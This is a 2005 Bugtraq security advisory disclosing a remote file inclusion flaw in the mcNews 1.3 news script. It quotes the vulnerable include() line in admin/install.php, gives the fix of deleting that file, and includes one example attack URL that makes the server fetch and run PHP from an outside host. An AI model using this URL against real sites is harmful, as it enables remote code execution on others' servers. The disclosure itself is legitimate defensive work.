Bugtraq: PHP mcNews arbitrary file inclusion

From: Jonathan Whiteley <jon.whiteley_at_gmail.com>
Date: Thu, 17 Mar 2005 00:40:21 +0000

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
BadRoot Security Advisory 2005-#0x01
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Thu Mar 17 2005 - 00:46 am GMT +1

Product: mcNews <=1.3 (successfully exploited on 1.3)
Vendor: http://www.phpforums.net/index.php?dir=dld (Home Page)
Type: Arbitrary file inclusion
Author: Jonathan Whiteley (Vukodlak)

Product description:
-----------------------------------

A News Management script.

Vulnerable code:
-----------------------------------

--> admin/install.php
...
33 if ($table==1)
34 {
35 include($l);
36 echo ''.$lGoAdmin.'';
37 }
...

Impact:
-----------------------------------

Anyone can inject PHP code by calling:
http://vuln-host.com/path/to/mcnews/admin/install.php?l=http://some.php/source

Solution:
-----------------------------------

Remove install.php, it's futile after first installation.

Contact:
-----------------------------------

    IRC: irc.us.azzurra.org - #badroot - Vukodlak
    E-Mail: jon.whiteley_at_gmail.com
    HP: http://www.badroot.org

Cheers

PS: Thanks to Arak for aid ;)
Received on Mar 17 2005